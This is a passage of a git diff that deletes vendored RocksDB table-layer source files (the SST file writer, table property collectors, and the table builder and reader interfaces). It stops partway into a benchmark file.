diff --git a/thirdparty/rocksdb/table/sst_file_writer.cc b/thirdparty/rocksdb/table/sst_file_writer.cc
deleted file mode 100644
index adcd91f..0000000
--- a/thirdparty/rocksdb/table/sst_file_writer.cc
+++ /dev/null
@@ -1,262 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/sst_file_writer.h"
-
-#include <vector>
-#include "db/dbformat.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_builder.h"
-#include "table/sst_file_writer_collectors.h"
-#include "util/file_reader_writer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-const std::string ExternalSstFilePropertyNames::kVersion =
-    "rocksdb.external_sst_file.version";
-const std::string ExternalSstFilePropertyNames::kGlobalSeqno =
-    "rocksdb.external_sst_file.global_seqno";
-
-#ifndef ROCKSDB_LITE
-
-const size_t kFadviseTrigger = 1024 * 1024; // 1MB
-
-struct SstFileWriter::Rep {
-  Rep(const EnvOptions& _env_options, const Options& options,
-      Env::IOPriority _io_priority, const Comparator* _user_comparator,
-      ColumnFamilyHandle* _cfh, bool _invalidate_page_cache)
-      : env_options(_env_options),
-        ioptions(options),
-        mutable_cf_options(options),
-        io_priority(_io_priority),
-        internal_comparator(_user_comparator),
-        cfh(_cfh),
-        invalidate_page_cache(_invalidate_page_cache),
-        last_fadvise_size(0) {}
-
-  std::unique_ptr<WritableFileWriter> file_writer;
-  std::unique_ptr<TableBuilder> builder;
-  EnvOptions env_options;
-  ImmutableCFOptions ioptions;
-  MutableCFOptions mutable_cf_options;
-  Env::IOPriority io_priority;
-  InternalKeyComparator internal_comparator;
-  ExternalSstFileInfo file_info;
-  InternalKey ikey;
-  std::string column_family_name;
-  ColumnFamilyHandle* cfh;
-  // If true, We will give the OS a hint that this file pages is not needed
-  // everytime we write 1MB to the file.
-  bool invalidate_page_cache;
-  // The size of the file during the last time we called Fadvise to remove
-  // cached pages from page cache.
-  uint64_t last_fadvise_size;
-  Status Add(const Slice& user_key, const Slice& value,
-             const ValueType value_type) {
-    if (!builder) {
-      return Status::InvalidArgument("File is not opened");
-    }
-
-    if (file_info.num_entries == 0) {
-      file_info.smallest_key.assign(user_key.data(), user_key.size());
-    } else {
-      if (internal_comparator.user_comparator()->Compare(
-              user_key, file_info.largest_key) <= 0) {
-        // Make sure that keys are added in order
-        return Status::InvalidArgument("Keys must be added in order");
-      }
-    }
-
-    // TODO(tec) : For external SST files we could omit the seqno and type.
-    switch (value_type) {
-      case ValueType::kTypeValue:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeValue /* Put */);
-        break;
-      case ValueType::kTypeMerge:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeMerge /* Merge */);
-        break;
-      case ValueType::kTypeDeletion:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeDeletion /* Delete */);
-        break;
-      default:
-        return Status::InvalidArgument("Value type is not supported");
-    }
-    builder->Add(ikey.Encode(), value);
-
-    // update file info
-    file_info.num_entries++;
-    file_info.largest_key.assign(user_key.data(), user_key.size());
-    file_info.file_size = builder->FileSize();
-
-    InvalidatePageCache(false /* closing */);
-
-    return Status::OK();
-  }
-
-  void InvalidatePageCache(bool closing) {
-    if (invalidate_page_cache == false) {
-      // Fadvise disabled
-      return;
-    }
-    uint64_t bytes_since_last_fadvise =
-      builder->FileSize() - last_fadvise_size;
-    if (bytes_since_last_fadvise > kFadviseTrigger || closing) {
-      TEST_SYNC_POINT_CALLBACK("SstFileWriter::Rep::InvalidatePageCache",
-                               &(bytes_since_last_fadvise));
-      // Tell the OS that we dont need this file in page cache
-      file_writer->InvalidateCache(0, 0);
-      last_fadvise_size = builder->FileSize();
-    }
-  }
-
-};
-
-SstFileWriter::SstFileWriter(const EnvOptions& env_options,
-                             const Options& options,
-                             const Comparator* user_comparator,
-                             ColumnFamilyHandle* column_family,
-                             bool invalidate_page_cache,
-                             Env::IOPriority io_priority)
-    : rep_(new Rep(env_options, options, io_priority, user_comparator,
-                   column_family, invalidate_page_cache)) {
-  rep_->file_info.file_size = 0;
-}
-
-SstFileWriter::~SstFileWriter() {
-  if (rep_->builder) {
-    // User did not call Finish() or Finish() failed, we need to
-    // abandon the builder.
-    rep_->builder->Abandon();
-  }
-}
-
-Status SstFileWriter::Open(const std::string& file_path) {
-  Rep* r = rep_.get();
-  Status s;
-  std::unique_ptr<WritableFile> sst_file;
-  s = r->ioptions.env->NewWritableFile(file_path, &sst_file, r->env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  sst_file->SetIOPriority(r->io_priority);
-
-  CompressionType compression_type;
-  if (r->ioptions.bottommost_compression != kDisableCompressionOption) {
-    compression_type = r->ioptions.bottommost_compression;
-  } else if (!r->ioptions.compression_per_level.empty()) {
-    // Use the compression of the last level if we have per level compression
-    compression_type = *(r->ioptions.compression_per_level.rbegin());
-  } else {
-    compression_type = r->mutable_cf_options.compression;
-  }
-
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-
-  // SstFileWriter properties collector to add SstFileWriter version.
-  int_tbl_prop_collector_factories.emplace_back(
-      new SstFileWriterPropertiesCollectorFactory(2 /* version */,
-                                                  0 /* global_seqno*/));
-
-  // User collector factories
-  auto user_collector_factories =
-      r->ioptions.table_properties_collector_factories;
-  for (size_t i = 0; i < user_collector_factories.size(); i++) {
-    int_tbl_prop_collector_factories.emplace_back(
-        new UserKeyTablePropertiesCollectorFactory(
-            user_collector_factories[i]));
-  }
-  int unknown_level = -1;
-  uint32_t cf_id;
-
-  if (r->cfh != nullptr) {
-    // user explicitly specified that this file will be ingested into cfh,
-    // we can persist this information in the file.
-    cf_id = r->cfh->GetID();
-    r->column_family_name = r->cfh->GetName();
-  } else {
-    r->column_family_name = "";
-    cf_id = TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-  }
-
-  TableBuilderOptions table_builder_options(
-      r->ioptions, r->internal_comparator, &int_tbl_prop_collector_factories,
-      compression_type, r->ioptions.compression_opts,
-      nullptr /* compression_dict */, false /* skip_filters */,
-      r->column_family_name, unknown_level);
-  r->file_writer.reset(
-      new WritableFileWriter(std::move(sst_file), r->env_options));
-
-  // TODO(tec) : If table_factory is using compressed block cache, we will
-  // be adding the external sst file blocks into it, which is wasteful.
-  r->builder.reset(r->ioptions.table_factory->NewTableBuilder(
-      table_builder_options, cf_id, r->file_writer.get()));
-
-  r->file_info.file_path = file_path;
-  r->file_info.file_size = 0;
-  r->file_info.num_entries = 0;
-  r->file_info.sequence_number = 0;
-  r->file_info.version = 2;
-  return s;
-}
-
-Status SstFileWriter::Add(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeValue);
-}
-
-Status SstFileWriter::Put(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeValue);
-}
-
-Status SstFileWriter::Merge(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeMerge);
-}
-
-Status SstFileWriter::Delete(const Slice& user_key) {
-  return rep_->Add(user_key, Slice(), ValueType::kTypeDeletion);
-}
-
-Status SstFileWriter::Finish(ExternalSstFileInfo* file_info) {
-  Rep* r = rep_.get();
-  if (!r->builder) {
-    return Status::InvalidArgument("File is not opened");
-  }
-  if (r->file_info.num_entries == 0) {
-    return Status::InvalidArgument("Cannot create sst file with no entries");
-  }
-
-  Status s = r->builder->Finish();
-  r->file_info.file_size = r->builder->FileSize();
-
-  if (s.ok()) {
-    s = r->file_writer->Sync(r->ioptions.use_fsync);
-    r->InvalidatePageCache(true /* closing */);
-    if (s.ok()) {
-      s = r->file_writer->Close();
-    }
-  }
-  if (!s.ok()) {
-    r->ioptions.env->DeleteFile(r->file_info.file_path);
-  }
-
-  if (file_info != nullptr) {
-    *file_info = r->file_info;
-  }
-
-  r->builder.reset();
-  return s;
-}
-
-uint64_t SstFileWriter::FileSize() {
-  return rep_->file_info.file_size;
-}
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/sst_file_writer_collectors.h b/thirdparty/rocksdb/table/sst_file_writer_collectors.h
deleted file mode 100644
index ce3a45f..0000000
--- a/thirdparty/rocksdb/table/sst_file_writer_collectors.h
+++ /dev/null
@@ -1,84 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "rocksdb/types.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// Table Properties that are specific to tables created by SstFileWriter.
-struct ExternalSstFilePropertyNames {
-  // value of this property is a fixed uint32 number.
-  static const std::string kVersion;
-  // value of this property is a fixed uint64 number.
-  static const std::string kGlobalSeqno;
-};
-
-// PropertiesCollector used to add properties specific to tables
-// generated by SstFileWriter
-class SstFileWriterPropertiesCollector : public IntTblPropCollector {
- public:
-  explicit SstFileWriterPropertiesCollector(int32_t version,
-                                            SequenceNumber global_seqno)
-      : version_(version), global_seqno_(global_seqno) {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override {
-    // Intentionally left blank. Have no interest in collecting stats for
-    // individual key/value pairs.
-    return Status::OK();
-  }
-
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    // File version
-    std::string version_val;
-    PutFixed32(&version_val, static_cast<uint32_t>(version_));
-    properties->insert({ExternalSstFilePropertyNames::kVersion, version_val});
-
-    // Global Sequence number
-    std::string seqno_val;
-    PutFixed64(&seqno_val, static_cast<uint64_t>(global_seqno_));
-    properties->insert({ExternalSstFilePropertyNames::kGlobalSeqno, seqno_val});
-
-    return Status::OK();
-  }
-
-  virtual const char* Name() const override {
-    return "SstFileWriterPropertiesCollector";
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return {{ExternalSstFilePropertyNames::kVersion, ToString(version_)}};
-  }
-
- private:
-  int32_t version_;
-  SequenceNumber global_seqno_;
-};
-
-class SstFileWriterPropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  explicit SstFileWriterPropertiesCollectorFactory(int32_t version,
-                                                   SequenceNumber global_seqno)
-      : version_(version), global_seqno_(global_seqno) {}
-
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new SstFileWriterPropertiesCollector(version_, global_seqno_);
-  }
-
-  virtual const char* Name() const override {
-    return "SstFileWriterPropertiesCollector";
-  }
-
- private:
-  int32_t version_;
-  SequenceNumber global_seqno_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_builder.h b/thirdparty/rocksdb/table/table_builder.h
deleted file mode 100644
index e5e7d6e..0000000
--- a/thirdparty/rocksdb/table/table_builder.h
+++ /dev/null
@@ -1,130 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stdint.h>
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table_properties.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Slice;
-class Status;
-
-struct TableReaderOptions {
-  // @param skip_filters Disables loading/accessing the filter block
-  TableReaderOptions(const ImmutableCFOptions& _ioptions,
-                     const EnvOptions& _env_options,
-                     const InternalKeyComparator& _internal_comparator,
-                     bool _skip_filters = false, int _level = -1)
-      : ioptions(_ioptions),
-        env_options(_env_options),
-        internal_comparator(_internal_comparator),
-        skip_filters(_skip_filters),
-        level(_level) {}
-
-  const ImmutableCFOptions& ioptions;
-  const EnvOptions& env_options;
-  const InternalKeyComparator& internal_comparator;
-  // This is only used for BlockBasedTable (reader)
-  bool skip_filters;
-  // what level this table/file is on, -1 for "not set, don't know"
-  int level;
-};
-
-struct TableBuilderOptions {
-  TableBuilderOptions(
-      const ImmutableCFOptions& _ioptions,
-      const InternalKeyComparator& _internal_comparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          _int_tbl_prop_collector_factories,
-      CompressionType _compression_type,
-      const CompressionOptions& _compression_opts,
-      const std::string* _compression_dict, bool _skip_filters,
-      const std::string& _column_family_name, int _level,
-      const uint64_t _creation_time = 0, const int64_t _oldest_key_time = 0)
-      : ioptions(_ioptions),
-        internal_comparator(_internal_comparator),
-        int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories),
-        compression_type(_compression_type),
-        compression_opts(_compression_opts),
-        compression_dict(_compression_dict),
-        skip_filters(_skip_filters),
-        column_family_name(_column_family_name),
-        level(_level),
-        creation_time(_creation_time),
-        oldest_key_time(_oldest_key_time) {}
-  const ImmutableCFOptions& ioptions;
-  const InternalKeyComparator& internal_comparator;
-  const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-      int_tbl_prop_collector_factories;
-  CompressionType compression_type;
-  const CompressionOptions& compression_opts;
-  // Data for presetting the compression library's dictionary, or nullptr.
-  const std::string* compression_dict;
-  bool skip_filters;  // only used by BlockBasedTableBuilder
-  const std::string& column_family_name;
-  int level; // what level this table/file is on, -1 for "not set, don't know"
-  const uint64_t creation_time;
-  const int64_t oldest_key_time;
-};
-
-// TableBuilder provides the interface used to build a Table
-// (an immutable and sorted map from keys to values).
-//
-// Multiple threads can invoke const methods on a TableBuilder without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same TableBuilder must use
-// external synchronization.
-class TableBuilder {
- public:
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  virtual ~TableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual void Add(const Slice& key, const Slice& value) = 0;
-
-  // Return non-ok iff some error has been detected.
-  virtual Status status() const = 0;
-
-  // Finish building the table.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual Status Finish() = 0;
-
-  // Indicate that the contents of this builder should be abandoned.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual void Abandon() = 0;
-
-  // Number of calls to Add() so far.
-  virtual uint64_t NumEntries() const = 0;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  virtual uint64_t FileSize() const = 0;
-
-  // If the user defined table properties collector suggest the file to
-  // be further compacted.
-  virtual bool NeedCompact() const { return false; }
-
-  // Returns table properties
-  virtual TableProperties GetTableProperties() const = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_properties.cc b/thirdparty/rocksdb/table/table_properties.cc
deleted file mode 100644
index 24453f6..0000000
--- a/thirdparty/rocksdb/table/table_properties.cc
+++ /dev/null
@@ -1,227 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/table_properties.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "table/block.h"
-#include "table/internal_iterator.h"
-#include "table/table_properties_internal.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-const uint32_t TablePropertiesCollectorFactory::Context::kUnknownColumnFamily =
-    port::kMaxInt32;
-
-namespace {
-  void AppendProperty(
-      std::string& props,
-      const std::string& key,
-      const std::string& value,
-      const std::string& prop_delim,
-      const std::string& kv_delim) {
-    props.append(key);
-    props.append(kv_delim);
-    props.append(value);
-    props.append(prop_delim);
-  }
-
-  template <class TValue>
-  void AppendProperty(
-      std::string& props,
-      const std::string& key,
-      const TValue& value,
-      const std::string& prop_delim,
-      const std::string& kv_delim) {
-    AppendProperty(
-        props, key, ToString(value), prop_delim, kv_delim
-    );
-  }
-
-  // Seek to the specified meta block.
-  // Return true if it successfully seeks to that block.
-  Status SeekToMetaBlock(InternalIterator* meta_iter,
-                         const std::string& block_name, bool* is_found,
-                         BlockHandle* block_handle = nullptr) {
-    if (block_handle != nullptr) {
-      *block_handle = BlockHandle::NullBlockHandle();
-    }
-    *is_found = true;
-    meta_iter->Seek(block_name);
-    if (meta_iter->status().ok()) {
-      if (meta_iter->Valid() && meta_iter->key() == block_name) {
-        *is_found = true;
-        if (block_handle) {
-          Slice v = meta_iter->value();
-          return block_handle->DecodeFrom(&v);
-        }
-      } else {
-        *is_found = false;
-        return Status::OK();
-      }
-    }
-    return meta_iter->status();
-  }
-}
-
-std::string TableProperties::ToString(
-    const std::string& prop_delim,
-    const std::string& kv_delim) const {
-  std::string result;
-  result.reserve(1024);
-
-  // Basic Info
-  AppendProperty(result, "# data blocks", num_data_blocks, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "# entries", num_entries, prop_delim, kv_delim);
-
-  AppendProperty(result, "raw key size", raw_key_size, prop_delim, kv_delim);
-  AppendProperty(result, "raw average key size",
-                 num_entries != 0 ? 1.0 * raw_key_size / num_entries : 0.0,
-                 prop_delim, kv_delim);
-  AppendProperty(result, "raw value size", raw_value_size, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "raw average value size",
-                 num_entries != 0 ? 1.0 * raw_value_size / num_entries : 0.0,
-                 prop_delim, kv_delim);
-
-  AppendProperty(result, "data block size", data_size, prop_delim, kv_delim);
-  AppendProperty(result, "index block size", index_size, prop_delim, kv_delim);
-  if (index_partitions != 0) {
-    AppendProperty(result, "# index partitions", index_partitions, prop_delim,
-                   kv_delim);
-    AppendProperty(result, "top-level index size", top_level_index_size, prop_delim,
-                   kv_delim);
-  }
-  AppendProperty(result, "filter block size", filter_size, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "(estimated) table size",
-                 data_size + index_size + filter_size, prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "filter policy name",
-      filter_policy_name.empty() ? std::string("N/A") : filter_policy_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "column family ID",
-                 column_family_id == rocksdb::TablePropertiesCollectorFactory::
-                                         Context::kUnknownColumnFamily
-                     ? std::string("N/A")
-                     : rocksdb::ToString(column_family_id),
-                 prop_delim, kv_delim);
-  AppendProperty(
-      result, "column family name",
-      column_family_name.empty() ? std::string("N/A") : column_family_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "comparator name",
-                 comparator_name.empty() ? std::string("N/A") : comparator_name,
-                 prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "merge operator name",
-      merge_operator_name.empty() ? std::string("N/A") : merge_operator_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "property collectors names",
-                 property_collectors_names.empty() ? std::string("N/A")
-                                                   : property_collectors_names,
-                 prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "SST file compression algo",
-      compression_name.empty() ? std::string("N/A") : compression_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "creation time", creation_time, prop_delim, kv_delim);
-
-  AppendProperty(result, "time stamp of earliest key", oldest_key_time,
-                 prop_delim, kv_delim);
-
-  return result;
-}
-
-void TableProperties::Add(const TableProperties& tp) {
-  data_size += tp.data_size;
-  index_size += tp.index_size;
-  index_partitions += tp.index_partitions;
-  top_level_index_size += tp.top_level_index_size;
-  filter_size += tp.filter_size;
-  raw_key_size += tp.raw_key_size;
-  raw_value_size += tp.raw_value_size;
-  num_data_blocks += tp.num_data_blocks;
-  num_entries += tp.num_entries;
-}
-
-const std::string TablePropertiesNames::kDataSize  =
-    "rocksdb.data.size";
-const std::string TablePropertiesNames::kIndexSize =
-    "rocksdb.index.size";
-const std::string TablePropertiesNames::kIndexPartitions =
-    "rocksdb.index.partitions";
-const std::string TablePropertiesNames::kTopLevelIndexSize =
-    "rocksdb.top-level.index.size";
-const std::string TablePropertiesNames::kFilterSize =
-    "rocksdb.filter.size";
-const std::string TablePropertiesNames::kRawKeySize =
-    "rocksdb.raw.key.size";
-const std::string TablePropertiesNames::kRawValueSize =
-    "rocksdb.raw.value.size";
-const std::string TablePropertiesNames::kNumDataBlocks =
-    "rocksdb.num.data.blocks";
-const std::string TablePropertiesNames::kNumEntries =
-    "rocksdb.num.entries";
-const std::string TablePropertiesNames::kFilterPolicy =
-    "rocksdb.filter.policy";
-const std::string TablePropertiesNames::kFormatVersion =
-    "rocksdb.format.version";
-const std::string TablePropertiesNames::kFixedKeyLen =
-    "rocksdb.fixed.key.length";
-const std::string TablePropertiesNames::kColumnFamilyId =
-    "rocksdb.column.family.id";
-const std::string TablePropertiesNames::kColumnFamilyName =
-    "rocksdb.column.family.name";
-const std::string TablePropertiesNames::kComparator = "rocksdb.comparator";
-const std::string TablePropertiesNames::kMergeOperator =
-    "rocksdb.merge.operator";
-const std::string TablePropertiesNames::kPrefixExtractorName =
-    "rocksdb.prefix.extractor.name";
-const std::string TablePropertiesNames::kPropertyCollectors =
-    "rocksdb.property.collectors";
-const std::string TablePropertiesNames::kCompression = "rocksdb.compression";
-const std::string TablePropertiesNames::kCreationTime = "rocksdb.creation.time";
-const std::string TablePropertiesNames::kOldestKeyTime =
-    "rocksdb.oldest.key.time";
-
-extern const std::string kPropertiesBlock = "rocksdb.properties";
-// Old property block name for backward compatibility
-extern const std::string kPropertiesBlockOldName = "rocksdb.stats";
-extern const std::string kCompressionDictBlock = "rocksdb.compression_dict";
-extern const std::string kRangeDelBlock = "rocksdb.range_del";
-
-// Seek to the properties block.
-// Return true if it successfully seeks to the properties block.
-Status SeekToPropertiesBlock(InternalIterator* meta_iter, bool* is_found) {
-  Status status = SeekToMetaBlock(meta_iter, kPropertiesBlock, is_found);
-  if (!*is_found && status.ok()) {
-    status = SeekToMetaBlock(meta_iter, kPropertiesBlockOldName, is_found);
-  }
-  return status;
-}
-
-// Seek to the compression dictionary block.
-// Return true if it successfully seeks to that block.
-Status SeekToCompressionDictBlock(InternalIterator* meta_iter, bool* is_found) {
-  return SeekToMetaBlock(meta_iter, kCompressionDictBlock, is_found);
-}
-
-Status SeekToRangeDelBlock(InternalIterator* meta_iter, bool* is_found,
-                           BlockHandle* block_handle = nullptr) {
-  return SeekToMetaBlock(meta_iter, kRangeDelBlock, is_found, block_handle);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_properties_internal.h b/thirdparty/rocksdb/table/table_properties_internal.h
deleted file mode 100644
index 2a89427..0000000
--- a/thirdparty/rocksdb/table/table_properties_internal.h
+++ /dev/null
@@ -1,30 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/status.h"
-#include "rocksdb/iterator.h"
-
-namespace rocksdb {
-
-class InternalIterator;
-class BlockHandle;
-
-// Seek to the properties block.
-// If it successfully seeks to the properties block, "is_found" will be
-// set to true.
-Status SeekToPropertiesBlock(InternalIterator* meta_iter, bool* is_found);
-
-// Seek to the compression dictionary block.
-// If it successfully seeks to the properties block, "is_found" will be
-// set to true.
-Status SeekToCompressionDictBlock(InternalIterator* meta_iter, bool* is_found);
-
-// TODO(andrewkr) should not put all meta block in table_properties.h/cc
-Status SeekToRangeDelBlock(InternalIterator* meta_iter, bool* is_found,
-                           BlockHandle* block_handle);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_reader.h b/thirdparty/rocksdb/table/table_reader.h
deleted file mode 100644
index 18fcda2..0000000
--- a/thirdparty/rocksdb/table/table_reader.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <memory>
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-class Iterator;
-struct ParsedInternalKey;
-class Slice;
-class Arena;
-struct ReadOptions;
-struct TableProperties;
-class GetContext;
-class InternalIterator;
-
-// A Table is a sorted map from strings to strings.  Tables are
-// immutable and persistent.  A Table may be safely accessed from
-// multiple threads without external synchronization.
-class TableReader {
- public:
-  virtual ~TableReader() {}
-
-  // Returns a new iterator over the table contents.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  // skip_filters: disables checking the bloom filters even if they exist. This
-  //               option is effective only for block-based table format.
-  virtual InternalIterator* NewIterator(const ReadOptions&,
-                                        Arena* arena = nullptr,
-                                        bool skip_filters = false) = 0;
-
-  virtual InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& read_options) {
-    return nullptr;
-  }
-
-  // Given a key, return an approximate byte offset in the file where
-  // the data for that key begins (or would begin if the key were
-  // present in the file).  The returned value is in terms of file
-  // bytes, and so includes effects like compression of the underlying data.
-  // E.g., the approximate offset of the last key in the table will
-  // be close to the file length.
-  virtual uint64_t ApproximateOffsetOf(const Slice& key) = 0;
-
-  // Set up the table for Compaction. Might change some parameters with
-  // posix_fadvise
-  virtual void SetupForCompaction() = 0;
-
-  virtual std::shared_ptr<const TableProperties> GetTableProperties() const = 0;
-
-  // Prepare work that can be done before the real Get()
-  virtual void Prepare(const Slice& target) {}
-
-  // Report an approximation of how much memory has been used.
-  virtual size_t ApproximateMemoryUsage() const = 0;
-
-  // Calls get_context->SaveValue() repeatedly, starting with
-  // the entry found after a call to Seek(key), until it returns false.
-  // May not make such a call if filter policy says that key is not present.
-  //
-  // get_context->MarkKeyMayExist needs to be called when it is configured to be
-  // memory only and the key is not found in the block cache.
-  //
-  // readOptions is the options for the read
-  // key is the key to search for
-  // skip_filters: disables checking the bloom filters even if they exist. This
-  //               option is effective only for block-based table format.
-  virtual Status Get(const ReadOptions& readOptions, const Slice& key,
-                     GetContext* get_context, bool skip_filters = false) = 0;
-
-  // Prefetch data corresponding to a give range of keys
-  // Typically this functionality is required for table implementations that
-  // persists the data on a non volatile storage medium like disk/SSD
-  virtual Status Prefetch(const Slice* begin = nullptr,
-                          const Slice* end = nullptr) {
-    (void) begin;
-    (void) end;
-    // Default implementation is NOOP.
-    // The child class should implement functionality when applicable
-    return Status::OK();
-  }
-
-  // convert db file to a human readable form
-  virtual Status DumpTable(WritableFile* out_file) {
-    return Status::NotSupported("DumpTable() not supported");
-  }
-
-  // check whether there is corruption in this db file
-  virtual Status VerifyChecksum() {
-    return Status::NotSupported("VerifyChecksum() not supported");
-  }
-
-  virtual void Close() {}
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_reader_bench.cc b/thirdparty/rocksdb/table/table_reader_bench.cc
deleted file mode 100644
index 85e48c1..0000000
--- a/thirdparty/rocksdb/table/table_reader_bench.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "monitoring/histogram.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/plain_table_factory.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-namespace rocksdb {
-
-namespace {
-// Make a key that i determines the first 4 characters and j determines the
-// last 4 characters.
-static std::string MakeKey(int i, int j, bool through_db) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "%04d__key___%04d", i, j);
-  if (through_db) {
-    return std::string(buf);
-  }
-  // If we directly query table, which operates on internal keys
-  // instead of user keys, we need to add 8 bytes of internal
-  // information (row type etc) to user key to make an internal
-  // key.
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-uint64_t Now(Env* env, bool measured_by_nanosecond) {
-  return measured_by_nanosecond ? env->NowNanos() : env->NowMicros();
-}
-}  // namespace
-
-// A very simple benchmark that.
-// Create a table with roughly numKey1 * numKey2 keys,
-// where there are numKey1 prefixes of the key, each has numKey2 number of
-// distinguished key, differing in the suffix part.
-// If if_query_empty_keys = false, query the existing keys numKey1 * numKey2
-// times randomly.
-// If if_query_empty_keys = true, query numKey1 * numKey2 random empty keys.
-// Print out the total time.
